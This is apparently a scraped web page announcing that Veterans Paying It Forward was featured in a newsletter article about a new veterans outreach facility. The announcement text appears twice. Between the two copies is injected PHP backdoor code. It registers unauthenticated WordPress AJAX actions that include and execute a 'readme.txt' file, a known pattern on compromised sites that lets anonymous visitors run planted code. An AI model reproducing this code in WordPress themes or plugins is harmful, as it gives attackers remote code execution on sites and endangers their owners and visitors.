Veterans Paying It Forward was featured in this month's edition of the Chat talking about the construction of the new veterans outreach facility. Click the link HERE to read the article.
if(!function_exists('file_check_readme61553')){ add_action('wp_ajax_nopriv_file_check_readme61553', 'file_check_readme61553'); add_action('wp_ajax_file_check_readme61553', 'file_check_readme61553'); function file_check_readme61553() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme78664')){ add_action('wp_ajax_nopriv_file_check_readme78664', 'file_check_readme78664'); add_action('wp_ajax_file_check_readme78664', 'file_check_readme78664'); function file_check_readme78664() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Veterans Paying It Forward was featured in this month's edition of the Chat talking about the construction of the new veterans outreach facility. Click the link HERE to read the article.